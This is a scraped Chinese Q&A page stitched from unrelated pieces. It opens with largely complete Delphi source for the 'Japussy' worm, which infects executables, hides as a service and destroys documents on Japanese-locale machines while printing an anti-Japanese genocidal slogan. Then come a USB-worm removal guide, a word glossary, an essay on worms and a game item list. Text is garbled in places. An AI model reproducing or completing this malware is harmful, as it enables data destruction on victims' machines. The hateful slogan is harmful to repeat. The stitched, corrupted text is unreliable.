wormbase(wormbase.org)

電腦病毒熊貓燒香代碼

是部分代碼!
program Japussy;
us
Windows, SysUtils, Class, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒體的大小
IconOfft = $12EB8; //PE文件主圖標的偏移量

//在Delphi5 SP1上面編譯得到的大小，其它版本的Delphi可能不同
//查找2800000020的十六進制字符串可以找到主圖標的偏移量

{
HeaderSize = 38912; //Upx壓縮過病毒體的大小
IconOfft = $92BC; //Upx壓縮過PE文件主圖標的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主圖標的大小--744字節(jié)
IconTail = IconOfft + IconSize; //PE文件主圖標的尾部
//垃圾碼，以備寫入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函數(shù)聲明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = Fal; //日文操作系統(tǒng)標記
{ 判斷是否為Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := Fal;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之間復(fù)制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 將宿主文件從已感染的PE文件中分離出來，以備使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳過頭部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO結(jié)構(gòu) }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpRerved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbRerved2 := 0;
Si.lpRerved2 := nil;
end;
{ 發(fā)帶毒郵件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之？
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出錯則文件正在被使用，退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己則不感染
Exit;
Infected := Fal;
IsPE := Fal;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //檢查PE文件頭
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE標記
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //檢查感染標記
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染過了或不是PE文件則退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主圖標(744字節(jié))，存入流
aIcon.ReleaHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//頭文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//寫入病毒體主圖標之前的數(shù)據(jù)
CopyStream(HdrStream, 0, DstStream, 0, IconOfft);
//寫入目前程序的主圖標
CopyStream(IcoStream, 22, DstStream, IconOfft, IconSize);
//寫入病毒體主圖標到病毒體尾部之間的數(shù)據(jù)
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//寫入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//寫入已感染的標記
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替換宿主文件
DstStream.Free;
end;
except;
end;
end;

{ 將目標文件寫入垃圾碼后刪除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只讀屬性
FileHandle := FileOpen(FileName, fmOpenWrite); //打開文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //寫入垃圾碼的隨機次數(shù)
if Max < 5 then
Max := 5;
Mass := Size div Max; //每個間隔塊的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//寫入垃圾碼，將文件徹底破壞掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClo(FileHandle); //關(guān)閉文件
end;
DeleteFile(PChar(FileName)); //刪除之
except
end;
end;
{ 獲得可寫的驅(qū)動器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍歷26個字母
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盤和網(wǎng)絡(luò)盤
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍歷目錄，感染和摧毀文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 0 //不是目錄
el if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 //不是根目錄
el Result := 2; //是根目錄
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //調(diào)整消息隊列，避免引起懷疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCa(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可執(zhí)行文件
end
el if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件，將Ba64編碼后的病毒寫入
//感染瀏覽此網(wǎng)頁的所有用戶

end
el if Ext = '.WAB' then //Outlook地址簿文件
begin
//獲取Outlook郵件地址
end
el if Ext = '.ADC' then //Foxmail地址自動完成文件
begin
//獲取Foxmail郵件地址
end
el if Ext = 'IND' then //Foxmail地址簿文件
begin
//獲取Foxmail郵件地址
end
el
begin
if IsJap then //是倭文操作系統(tǒng)
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毀文件
end;
end;
end;
//感染或刪除一個文件后睡眠200毫秒，避免CPU占用率過高引起懷疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClo(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClo(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings[i] + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍歷磁盤上所有的文件 }
procedure InfectFiles;

var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系統(tǒng)
IsJap := True; //去死吧！
DriverList := GetDrives; //得到可寫的磁盤列表
Len := Length(DriverList);
while True do //死循環(huán)
begin
for i := Len downto 1 do //遍歷每個磁盤驅(qū)動器
LoopFiles(DriverList[i] + ':', '*.*'); //感染之
SendMail; //發(fā)帶毒郵件
Sleep(1000 * 60 * 5); //睡眠5分鐘
end;
end;
{ 主程序開始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注冊為服務(wù)進程
el //WinNT
begin
//遠程線程映射到Explorer進程
//哪位兄臺愿意完成之？
end;
//如果是原始病毒體自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和發(fā)郵件
el //已寄生于宿主程序上了，開始工作
begin
TmpFile := ParamStr(0); //創(chuàng)建臨時文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一個空格
ExtractFile(TmpFile); //分離之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //創(chuàng)建新進程運行之
InfectFiles; //感染和發(fā)郵件
end;
end.

這是什么病毒？

病毒名稱：Worm.Win32.RJump.a（AVP）
病毒別名：Trojan.Spy.IeSpy.q（瑞星）
病毒大?。?,515,723 字節(jié)
加殼方式：無
樣本MD5：3efdfddfffe5cf4ad40c5368c336a702
發(fā)現(xiàn)時間：2006.5.19
更新時間：2006.6.1
關(guān)聯(lián)病毒：
傳播方式：通過U盤、移動硬盤、MP3等
中毒特征：生成RavMonE.exe、RavMoneE.exe.log、RavMonlog
病毒簡介：用PYTHON語言編寫，py2exe打包
變種特征：RavMon.exe、AdobeR.exe

技術(shù)分析
==========
1. 運行后生成
windows\RavMonE.exe（3,515,723 字節(jié)）——病毒本身
msvcr71.dll（348,160字節(jié)）——庫文件，支持病毒運行
RavMoneE.exe.log（644字節(jié)）
RavMonlog（5字節(jié)）
Autorun.inf（103字節(jié)）

2. 添加注冊表

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RavAV" = "windows\RavMonE.exe"

3. Autorun.inf內(nèi)容：
[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\Auto\command=RavMonE.exe e
shell=Auto
用來啟動RavMonE.exe

4. RavMoneE.exe.log內(nèi)容：
Traceback (most recent call last):
File "RavMonE.py", line 1, in ?
File "zipextimporter.pyo", line 78, in load_module
File "twisted\internet\reactor.pyo", line 12, in ?
File "twisted\internet\lectreactor.pyo", line 182, in install
File "twisted\internet\posixba.pyo", line 168, in _init_
File "twisted\internet\ba.pyo", line 268, in _init_
File "twisted\internet\ba.pyo", line 568, in _initThreads
File "twisted\internet\posixba.pyo", line 265, in installWaker
File "twisted\internet\posixba.pyo", line 77, in _init_
File "", line 1, in listen
socket.error: (10022, 'Invalid argument')

5. RavMonlog內(nèi)容：
16704 17608 類似的數(shù)字

＝＝＝
清除方法：

1. ctrl+alt+del，打開任務(wù)管理器，結(jié)束RavmonE.exe進程。

2. 在開始菜單>>>運行>>>輸入regedit，刪除注冊表的鍵值
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
C:\WINDOWS\RavMonE.exe
一切OK。

3. 刪除windows\RavMonE.exe、msvcr71.dll、RavMoneE.exe.log、RavMonlog。

4. 打開“文件夾選項”，在“查看”選項卡中，去掉“隱藏受保護的操作系統(tǒng)文件”前的勾，同時選中“顯示所以文件和文件夾”。

5. 用右鍵打開U盤(不要雙擊打開)，刪除包括RavmonE.exe、msvcr71.dll、RavMoneE.exe.log、RavMonlog、autorun.inf。

6.將你電腦上的 [移動硬盤H：] 重命名叫什么都行，先叫著將U盤安全拔出后再把命名改回去文件選項也選回去，就可以了。

注：RavMon.exe和AdobeR.exe的清除方法類似。
PS：msvcr71.dll是用來支持病毒本身運行的，刪除的時候請注意文件生成時間是否與病毒生成的時間一致。

用了以上的方法，終于把它徹底清理干凈了！！

以后，又要注意防毒?。ㄎ覟槭裁匆f又？）

請給我解釋一下這幾個單詞？

1.handle
n.柄，把手，把柄，口實，手感
vt.觸摸，運用，買賣，處理，操作
vi.搬運，易于操作
n.[計]句柄

2.fddder tray
這個你可能寫錯了吧！
tray是盤，碟，盤子的意思！前面那個就不清楚

3.worm drive sleeve
worm蟲，蠕蟲，蠕行，慢慢前進
drive駕駛，開車，飛跑
sleeve袖子

4.worm drive
同上

5.mincing
adj.裝腔作勢的
v.切碎

6.coar mincing blade
coar粗糙的，粗鄙的
blade刀片，刀刃

7.fine mincing blade
fine
adj.美好的，優(yōu)良的，杰出的，纖細
n.罰款，罰金，晴天，精細
vt.罰款，精煉，澄清
vi.變清，變細
adv.<口>很好，妙

8.blade cover bezel
cover蓋子，封面，覆蓋，掩護
bezel寶石的斜面，鑿的刃角

9.locking device
locking關(guān)閉，鎖閉
device裝置，設(shè)計，圖案

10.non slip ba
non不，非
slip滑倒，事故
ba底部，基礎(chǔ)，以...作基礎(chǔ)

11.locking device key
locking key制動鍵，鎖閉鑰匙

12.easy to clean
easy容易的，安逸的，舒適的
clean清潔的，干凈的

13.special ba
special特派員，專車，專門的，轉(zhuǎn)用的

蠕蟲病毒為什么帶來網(wǎng)絡(luò)賭塞?

主要原因還是蠕蟲病毒的自我復(fù)制及無限循環(huán)理論，摘抄一篇文章給你看看，希望有所幫助： 1 (1)傳染方式多。蠕蟲病毒入侵網(wǎng)絡(luò)的主要途徑是通過工作站傳播到服務(wù)器硬盤中，再由服務(wù)器的共享目錄傳播到其他的工作站。但蠕蟲病毒的傳染方式比較復(fù)雜。 (2)傳播速度快。在單機上，病毒只能通過軟盤從一臺計算機傳染到另一臺計算機，而在網(wǎng)絡(luò)中則可以通過網(wǎng)絡(luò)通信機制，借助高速電纜進行迅速擴散。 (3)清除難度大。在單機中，再頑固的病毒也可通過刪除帶毒文件、低級格式化硬盤等措施將病毒清除。而網(wǎng)絡(luò)中只要有一臺工作站未能殺毒干凈就可能使整個網(wǎng)絡(luò)重新全部被病毒感染，甚至剛剛完成殺毒工作的一臺工作站馬上就能被網(wǎng)上另一臺工作站的帶毒程序所傳染，因此，僅對工作站進行病毒殺除不能徹底解決網(wǎng)絡(luò)蠕蟲病毒的問題。 (4)破壞性強。網(wǎng)絡(luò)中蠕蟲病毒將直接影響網(wǎng)絡(luò)的工作狀態(tài)，輕則降低速度，影響工作效率；重則造成網(wǎng)絡(luò)系統(tǒng)的癱瘓，破壞服務(wù)器系統(tǒng)資源，使多年的工作毀于一旦。 2 一、蠕蟲病毒具有自我復(fù)制能力 二、蠕蟲病毒具有很強的傳播性 三、蠕蟲病毒具有一定的潛伏性 四、蠕蟲病毒具有特定的觸發(fā)性 五、蠕蟲病毒具有很大的破壞性 最早的網(wǎng)絡(luò)蠕蟲病毒作者是美國的小莫里思，他編寫的蠕蟲病毒是在美國軍方的局域網(wǎng)內(nèi)活動，但是，必需事先獲取局域網(wǎng)的權(quán)限和口令。 世界性的第一個大規(guī)模在Internet網(wǎng)上傳播的網(wǎng)絡(luò)蠕蟲病毒是1998年底的Happy99網(wǎng)絡(luò)蠕蟲病毒，當你在網(wǎng)上向外發(fā)出信件時，HAPPY99網(wǎng)絡(luò)蠕蟲病毒會頂替你的信件或隨你的信件從網(wǎng)上跑到你發(fā)信的目標出，到了1月1日，收件人一執(zhí)行，便會在屏幕上不斷暴發(fā)出絢麗多彩的禮花，機器就不在干什么了。 1999年3月歐美暴發(fā)了“美麗殺”網(wǎng)絡(luò)蠕蟲宏病毒，歐美最大的一些網(wǎng)站頻頻遭受到堵塞，造成巨大經(jīng)濟損失。 2000年至今，是網(wǎng)絡(luò)蠕蟲開始大鬧互聯(lián)網(wǎng)的發(fā)展期。 2000年，在歐美還暴發(fā)了I-WORM/Love Letter“愛蟲”網(wǎng)絡(luò)蠕蟲病毒，又使歐美最大的一些網(wǎng)站和企業(yè)及政府的服務(wù)器頻頻遭受到堵塞和破壞，造成了比“美麗殺”病毒破壞還大的經(jīng)濟損失。目前，該病毒以有十多種變種產(chǎn)生，不斷的到處破壞。 2001后，有更多的網(wǎng)絡(luò)蠕蟲出現(xiàn)。 I-WORM.NAVIDAD網(wǎng)絡(luò)蠕蟲。該病毒能引發(fā)大規(guī)模的郵件泛濫。其傳播機制不同于一般的網(wǎng)絡(luò)蠕蟲程序（如愛蟲、美麗公園等），該網(wǎng)絡(luò)蠕蟲程序具有較大的迷惑性：用戶通過OUTLOOK EXPRESS 收到的是一封來自你曾經(jīng)發(fā)送過的人的回復(fù)信件，內(nèi)容與您發(fā)送的完全一致，郵件的主題、郵件的正文都一樣，只是增加了一個電子郵件的附件，該附件的文件名稱是：NAVIDAD.EXE文件，文件的大小是：32768字節(jié)。該附件就是該網(wǎng)絡(luò)蠕蟲程序的主體文件。該郵件只是在微軟的OUTLOOK EXPRESS郵件系統(tǒng)下自動傳播，它會自動地給您的收件箱(而不是地址簿)的所有人發(fā)送一份該網(wǎng)絡(luò)蠕蟲程序。 由于病毒修改該注冊表項目的文件名稱的錯誤，WINDOWS系統(tǒng)在啟動，讀取可執(zhí)行EXE文件時，會因為找不到WINSVRC.EXE文件而不能正常啟動WINDOWS 系統(tǒng)。 I_WORM.Blebla.B網(wǎng)絡(luò)蠕蟲。該病毒是通過電子郵件的附件來發(fā)送的，文件的名稱是：xromeo.exe 和xjuliet.chm，該蠕蟲程序的名稱由此而來。 當用戶在使用OE閱讀信件時，這兩個附件自動被保存、運行。 當運行了該附件后， 該蠕蟲程序?qū)⒆陨戆l(fā)送給OUTLOOK地址薄里的每一個人，并將信息發(fā)送給alt.comp.virus 新聞組。該蠕蟲程序是以一個EMAIL附件的形式發(fā)送的，信件的主體是以HTML語言寫成的，并且含有兩個附件：xromeo.exe及xjuliet.chm.收件人本身看不見什么郵件的內(nèi)容。 該蠕蟲程序的危害性還表現(xiàn)在它還能修改注冊表一些項目，使得一些文件的執(zhí)行，必須依賴該蠕蟲程序生成的在WINDOWS目錄下的SYSRNJ.EXE文件,由此可見對于該病毒程序的清除不能簡單的將蠕蟲程序刪除掉,而必需先將注冊表中的有關(guān)該蠕蟲的設(shè)置刪除后,才能刪除這些蠕蟲程序。 I_WORM/EMANUEL網(wǎng)絡(luò)蠕蟲。該病毒通過MICROSOFT的OUTLOOK EXPRESS來自動傳播給受感染計算機的地址薄里的所有人，給每人發(fā)送一封帶有該附件的郵件。該網(wǎng)絡(luò)蠕蟲長度16,896-22000字節(jié)，有多個變種。 在用戶執(zhí)行該附件后，該網(wǎng)絡(luò)蠕蟲程序在系統(tǒng)狀態(tài)區(qū)域的時鐘旁邊放置一個“花”一樣的圖標，如果用戶點擊該"花"圖標，會出現(xiàn)一個消息框,大意是不要按此按鈕.如果按了該按鈕的話,會出現(xiàn)一個以Emmanuel為標題的信息框, 當您關(guān)閉該信息框時又會出現(xiàn)一些別的:諸如上帝保佑您的提示信息. 還有一個網(wǎng)絡(luò)蠕蟲I-Worm/Hybris的最明顯的特征是, 當您打開帶有該網(wǎng)絡(luò)蠕蟲程序的附件時, 您的計算機的屏幕就會被一個始終位于最上方的圖象所覆蓋,該圖象是活動的、轉(zhuǎn)動的、黑白相見的螺旋狀的圓形圖形。 該網(wǎng)絡(luò)蠕蟲程序與其他常見的網(wǎng)絡(luò)蠕蟲程序一樣,是通過網(wǎng)絡(luò)上的電子郵件系統(tǒng)OUTLOOK來傳播的, 同樣是修改WINDOWS系統(tǒng)下的主管電子郵件收發(fā)的文件wsock32.dll文件。它與別的網(wǎng)絡(luò)蠕蟲程序的不同之處在于它不斷可以通過網(wǎng)絡(luò)自動發(fā)送網(wǎng)絡(luò)蠕蟲程序本身，而且發(fā)送的文件的名稱是變化的。 該病毒是世界上第一個可自我將病毒體分解成多個大小可變化的程序塊（插件），分別潛藏計算機內(nèi)的不同位置，以便躲避查毒軟件。該病毒具有將這些碎塊聚合成一個完整的病毒，再進行傳播和破壞。早在1997年王江民先生在〈〈計算機病毒的發(fā)展趨勢與對抗手段〉〉一文中就有一段話預(yù)言會有這種病毒出現(xiàn)。 I_WORM/HTML.Little Davinia網(wǎng)絡(luò)蠕蟲。這是一個破壞性極大的網(wǎng)絡(luò)蠕蟲，可以清除硬盤上的所有數(shù)據(jù)，它利用WORD2000的漏洞、EMAIL等來傳播。該網(wǎng)絡(luò)蠕蟲程序是復(fù)合型的, 是HTML（網(wǎng)頁語言）形式的、VBS文件結(jié)構(gòu)、帶有宏的網(wǎng)絡(luò)蠕蟲程序。 該病毒還能修改系統(tǒng)的注冊表，一旦修改注冊表成功，該病毒就會自動搜索所有的本地硬盤、網(wǎng)絡(luò)盤、以及所有目錄下的文件，采用覆蓋的方式將發(fā)現(xiàn)的文件寫上一些含有一些雜亂信息的文字，被損壞的文件很難修復(fù)！ I_WORM.MTX網(wǎng)絡(luò)蠕蟲病毒已大面積傳播, 超過了CIH的感染率,但破壞性沒CIH大。 它是一個變形病毒, 變化無窮。該網(wǎng)絡(luò)蠕蟲的郵件比較特殊，它沒有主題、正文，只有一個附件文件，附件的文件名是變化的。 I-WORM.AnnaKournikova網(wǎng)絡(luò)蠕蟲程序是使用了一個病毒制造機程序VBSWG制造并加密。該蠕蟲程序發(fā)送的郵件的附件是： AnnaKournikova.jpg.vbs（俄羅斯體育選手的名稱命名的文件名稱），它是一個VBS程序文件。當郵件用戶不小心執(zhí)行了該附件，那么該網(wǎng)絡(luò)蠕蟲程序會給OUTLOOK地址薄里的所有人發(fā)送一份該網(wǎng)絡(luò)蠕蟲程序，郵件的附件文件名稱： AnnaKournikova.jpg.vbs（俄羅斯網(wǎng)球女明星的圖片文件） 該網(wǎng)絡(luò)蠕蟲程序的長度是2853字節(jié)左右。 如果機器的日期是1月26日的話，該網(wǎng)絡(luò)蠕蟲程序會自動將您指向一個位于荷蘭的計算機商店的網(wǎng)絡(luò)地址。 該網(wǎng)絡(luò)蠕蟲程序會給所有地址薄里的所有用戶發(fā)送網(wǎng)絡(luò)蠕蟲程序來看，它和轟動一時的“愛蟲程序”有相似之處。 I-Worm.Magistr網(wǎng)絡(luò)蠕蟲惡性病毒可通過互聯(lián)網(wǎng)上電子郵件或在局域網(wǎng)內(nèi)進行傳播?？赏ㄟ^Outlook、Netscape Mesnger等其他電子郵件軟件和新聞組在內(nèi)的軟件讀取其中地址簿中的地址發(fā)送帶毒電子郵件進行傳播。 該病毒隨機在當前機上找一個.EXE或.SCR文件和一些.DOC或.TXT文件作為附件發(fā)出去，如果你的機中.DOC或.TXT文件是機密文件，肯定會被發(fā)在互聯(lián)網(wǎng)上到處都是。 目前，該病毒已有許許多多的變種。病毒發(fā)作時間是在病毒感染系統(tǒng)一個月后。病毒會改寫本地機和局域網(wǎng)中電腦上的文件，文件內(nèi)容全部被改寫，這將導致文件不能恢復(fù)！ 如果在WIN9X環(huán)境下，該病毒會象CIH病毒一樣，破壞BIOS和清除硬盤上的數(shù)據(jù)，是危害性一非常大的一種病毒。 該病毒采用了多變形引擎和兩組加密模塊，病毒感染文件的中部和尾部，將中部的原文件部分代碼加密后潛藏在病毒體內(nèi)，病毒長為24000-30000字節(jié)。 病毒使用了非常復(fù)雜的感染機制，感染.EXE、.DLL、.OCX、.SCR、.CPL等文件，病毒每傳染一個目標，就變化一次，具有無窮次變化，其目的是使反病毒軟件難以發(fā)現(xiàn)和清除。 病毒在發(fā)展，網(wǎng)絡(luò)在發(fā)展，網(wǎng)絡(luò)又促進了病毒的發(fā)展，復(fù)雜的病毒又超著變形病 蠕蟲病毒的一般防治方法是：使用具有實時監(jiān)控功能的殺毒軟件，并且注意不要輕易打開不熟悉的郵件附件。 蠕蟲病毒主要具備以下特點。 1．較強的獨立性 從某種意義上來講，蠕蟲病毒開辟了計算機病毒傳播和破壞能力的"新紀元"。我們在前一章講到的傳統(tǒng)計算機病毒一般都需要宿主程序，病毒將自己的代碼寫到宿主程序中，當該程序運行時先執(zhí)行寫入的病毒程序，從而造成感染和破壞。而蠕蟲病毒不需要宿主程序，它是一段獨立的程序或代碼，因此也就避免了受宿主程序的牽制，可以不依賴于宿主程序而獨立運行，從而主動地實施攻擊。 2．利用漏洞主動攻擊 由于不受宿主程序的限制，蠕蟲病毒可以利用操作系統(tǒng)的各種漏洞進行主動攻擊。"尼姆達"病毒利用了IE瀏覽器的漏洞，使感染了病毒的郵件附件在不被打開的情況下就能激活病毒；"紅色代碼"利用了微軟IIS服務(wù)器軟件的漏洞（idq.dll遠程緩存區(qū)溢出）來傳播；而蠕蟲王病毒則是利用了微軟數(shù)據(jù)庫系統(tǒng)的一個漏洞進行攻擊。 3．傳播更快更廣 蠕蟲病毒比傳統(tǒng)病毒具有更大的傳染性，它不僅僅感染本地計算機，而且會以本地計算機為基礎(chǔ)，感染網(wǎng)絡(luò)中所有的服務(wù)器和客戶端。蠕蟲病毒可以通過網(wǎng)絡(luò)中的共享文件夾、電子郵件、惡意網(wǎng)頁以及存在著大量漏洞的服務(wù)器等途徑肆意傳播，幾乎所有的傳播手段都被蠕蟲病毒運用得淋漓盡致，因此，蠕蟲病毒的傳播速度可以是傳統(tǒng)病毒的幾百倍，甚至可以在幾個小時內(nèi)蔓延全球，造成難以估量的損失。 我們可以做一個簡單的計算：如果某臺被蠕蟲感染的計算機的地址簿中有100個人的郵件地址，那么病毒就會自動給這100個人發(fā)送帶有病毒的郵件，假設(shè)這100個人中每個人的地址簿中又都有100個人的聯(lián)系方式，那很快就會有100 100 = 10 000個人感染該病毒，如果病毒再次按照這種方式傳播就會再有100 100 100 1 000 000個人感染，而整個感染過程很可能會在幾個小時內(nèi)完成。由此可見，蠕蟲病毒的傳播速度非常驚人。 4．更好的偽裝和隱藏方式 為了使蠕蟲病毒在更大范圍內(nèi)傳播，病毒的編制者非常注重病毒的隱藏方式。 在通常情況下，我們在接收、查看電子郵件時，都采取雙擊打開郵件主題的方式瀏覽郵件內(nèi)容，如果郵件中帶有病毒，用戶的計算機就會立刻被病毒感染。因此，通常的經(jīng)驗是：不運行郵件的附件就不會感染蠕蟲病毒。但是，目前比較流行的蠕蟲病毒將病毒文件通過ba64編碼隱藏到郵件的正文中，并且通過mine的漏洞造成用戶在單擊郵件時，病毒就會自動解碼到硬盤上并運行。 通過在郵件系統(tǒng)中查看郵件的全部信息，可以看到郵件中會隱藏著name "news_doc.doc.scr"等信息（如圖5-2所示）。圖中下方的大量編碼就是實際的病毒體文件，這些編碼會在用戶單擊后生成news_doc.doc.scr并運行。這樣一來，用戶在單擊郵件主題進行預(yù)覽時，就會在不知不覺中"中招"。 此外，諸如Nimda和求職信（Klez）等病毒及其變種還利用添加帶有雙擴展名的附件等形式來迷惑用戶，使用戶放松警惕性，從而進行更為廣泛的傳播。 5．技術(shù)更加先進 一些蠕蟲病毒與網(wǎng)頁的腳本相結(jié)合，利用VB Script、Java、ActiveX等技術(shù)隱藏在HTML頁面里。當用戶上網(wǎng)瀏覽含有病毒代碼的網(wǎng)頁時，病毒會自動駐留內(nèi)存并伺機觸發(fā)。還有一些蠕蟲病毒與后門程序或木馬程序相結(jié)合，比較典型的是"紅色代碼病毒"，它會在被感染計算機Web目錄下的\scripts下將生成一個root.exe后門程序，病毒的傳播者可以通過這個程序遠程控制該計算機。這類與黑客技術(shù)相結(jié)合的蠕蟲病毒具有更大的潛在威脅。

下了一個僵尸毀滅工程物品修改器，都是英文，看不懂，找盒釘子都找不到，哪位大俠可以把所有物品都翻譯過

翻譯？我翻譯了個不太全面的，但起碼殺差不多了，跟著“|”符號的，就是這種物品有很多種貼圖或名字，例如Crisps1和Crisps2是兩種不同的貼圖。記得要加前綴，比如薯片(Crisps)刷物品時要加Ba,變成Ba.Crisps,有三種前綴，像能種出來的食物，要加farming前綴。

MortarPestle 研體
WildGarlic 野生大蒜
Plantain 車前草
Comfrey 紫色草藥 Cataplasm 藥膏(加在草藥后面可以敷在傷口上)
LemonGrass 檸檬草
BlackSage 黑鼠尾草
CommonMallow 普通錦葵植物
Ginng 人參
GrapeLeaves 葡萄葉
Violets 紫羅蘭花瓣
Rohips 玫瑰果
MushroomGeneric 1234567 4有毒 蘑菇
BerryGeneric 12345 2是有毒 漿果
BerryPoisonIvy “有毒”的漿果
BerryBlue|Black 藍|黑莓
farming.HandShovel 手鏟
farming.GardeningSprayFull 園藝噴壺（滿）
farming.Potato 土豆
farming.Tomato 番茄 BagSeed 一包種子，加在后面可以刷出種子，例如farming.TomatoBagSeed
Fertilizer 肥料
Screwdriver 螺絲刀
Sledgehammer 大鐵錘
HutingKnife 獵刀
Hammer 鐵錘
Pan 平底煎鍋
Woodglue 木膠
DuctTape 管道膠帶
Glue 膠水
Scotchtape 膠帶
-----------------------------------
Antibiotics 抗生素
